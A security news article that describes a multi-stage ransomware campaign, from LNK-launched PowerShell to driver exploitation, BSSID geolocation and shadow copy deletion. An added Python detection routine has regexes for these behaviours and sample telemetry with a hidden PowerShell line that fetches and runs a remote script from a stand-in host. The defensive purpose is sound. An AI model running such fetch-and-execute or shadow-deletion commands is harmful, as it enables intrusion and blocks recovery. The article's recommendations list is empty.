A new and highly sophisticated ransomware campaign, dubbed “DOGE BIG BALLS Ransomware,” has recently come to light, demonstrating a blend of technical innovation and psychological manipulation.
This operation stands out for its multi-stage infection chain, which begins with a seemingly innocuous ZIP file and culminates in the deployment of a customized ransomware payload, all while leveraging advanced evasion techniques.
The attack typically starts with a ZIP file, often themed around financial matters such as “Pay Adjustment.zip.” Inside, a deceptive LNK (shortcut) file masquerades as a PDF or other legitimate document.
When the victim opens this shortcut, it silently executes a series of PowerShell commands.
These commands download and run a script that checks for administrative privileges and, depending on the user’s access level, downloads additional malicious files.
If administrative rights are detected, the script creates a hidden folder in the system’s startup directory and downloads a modified version of the Fog ransomware disguised as “Adobe Acrobat.exe.”
It also retrieves a kernel exploit tool, “ktool.exe,” which is crucial for the next phase of the attack.
For non-admin users, the ransomware is placed in a user-specific startup folder, likely to be triggered later.
The PowerShell scripts used in this campaign are notable for their anti-analysis features and psychological tactics.
They include provocative statements and references to real individuals, likely intended to confuse or intimidate victims and analysts.
A standout feature of this campaign is its use of the Bring Your Own Vulnerable Driver (BYOVD) technique.
The attackers exploit a known vulnerability in an Intel driver (CVE-2015-2291) to gain kernel-level access.
This allows them to escalate privileges, disable security logging, and ensure the ransomware can operate undetected.
The kernel exploit tool is executed with a process ID and a hardcoded key, acting as an execution guardrail to prevent unauthorized use.
Before encrypting files, the ransomware collects extensive system and network information, including hardware IDs, network configurations, and running processes.
Uniquely, it queries the Wigle.net API using the MAC address of the victim’s router (BSSID) to determine the physical location of the device.
This method provides far more accurate geolocation than traditional IP-based techniques, indicating a highly targeted approach.
Once executed, the ransomware displays a confirmation prompt, opens a ransom note, and logs its activities.
The ransom note references a real individual, Edward Coristine, and demands payment in Monero cryptocurrency.
The branding and references appear designed to mislead, intimidate, or malign specific individuals or organizations.
After encrypting files with the “.flocked” extension, the ransomware drops ransom notes in every affected folder and deletes shadow volume copies to prevent recovery.
The attack also embeds a Havoc C2 beacon, suggesting the potential for long-term access or further post-encryption activities.
Anti-analysis techniques, such as environment variable checks, are used to evade detection in sandboxed or monitored environments.
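The behaviours described above (an LNK-launched PowerShell downloader, an executable dropped into a startup folder, the Wigle.net geolocation lookup, shadow copy deletion) written as a small hunting routine over endpoint telemetry. This is an added example, not code from the article or any vendor; the event schema, the field names and the sample events are all assumptions constructed for illustration.

```python
import re

# Regexes for the behaviours the article attributes to the chain. The LNK itself is not
# visible in process telemetry, so explorer.exe spawning PowerShell with a download
# cmdlet is used as the proxy for "victim double-clicked the shortcut".
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\", re.I)
DOWNLOADER = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I)
SHADOW_DELETE = re.compile(r"vssadmin.*delete\s+shadows|wmic.*shadowcopy\s+delete", re.I)

# Field names (host, type, parent, image, cmdline, dest_host, path) are an assumed schema.
RULES = {
    "lnk_spawned_powershell_downloader": lambda e: (
        e.get("type") == "process"
        and e.get("parent", "").lower().endswith("explorer.exe")
        and e.get("image", "").lower().endswith("powershell.exe")
        and bool(DOWNLOADER.search(e.get("cmdline", "")))),
    "shadow_copy_deletion": lambda e: (
        e.get("type") == "process" and bool(SHADOW_DELETE.search(e.get("cmdline", "")))),
    "wigle_bssid_geolocation": lambda e: (
        e.get("type") == "network" and e.get("dest_host", "").lower().endswith("wigle.net")),
    "exe_dropped_in_startup_folder": lambda e: (
        e.get("type") == "file" and e.get("path", "").lower().endswith(".exe")
        and bool(STARTUP_DIR.search(e.get("path", "")))),
}

def match_rules(event):
    """Names of every rule a single event satisfies."""
    return [name for name, pred in RULES.items() if pred(event)]

def triage(events, threshold=2):
    """Group hits per host; flag hosts showing at least `threshold` distinct behaviours,
    so one benign vssadmin or PowerShell event on its own does not page anyone."""
    hits = {}
    for e in events:
        for name in match_rules(e):
            hits.setdefault(e["host"], set()).add(name)
    return {h: sorted(names) for h, names in hits.items() if len(names) >= threshold}

# Constructed sample telemetry (not real logs): ws01 shows the chain, ws02 is routine admin work.
SAMPLE_EVENTS = [
    {"host": "ws01", "type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://example.invalid/stage1.ps1 | iex"'},
    {"host": "ws01", "type": "file",
     "path": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe Acrobat.exe"},
    {"host": "ws01", "type": "network", "dest_host": "api.wigle.net"},
    {"host": "ws01", "type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": "Adobe Acrobat.exe", "cmdline": "vssadmin delete shadows /all /quiet"},
    {"host": "ws02", "type": "process", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\vssadmin.exe", "cmdline": "vssadmin list shadows"},
    {"host": "ws02", "type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": "powershell.exe", "cmdline": "powershell Get-ChildItem C:\\"},
]

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))  # only ws01 is flagged, with all four behaviours
```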
To defend against such advanced threats, organizations should:
The DOGE BIG BALLS ransomware campaign exemplifies the evolving sophistication of cyber threats, combining technical innovation with psychological tactics to maximize impact and evade detection.
Robust, layered security measures are essential to defend against such multi-faceted attacks.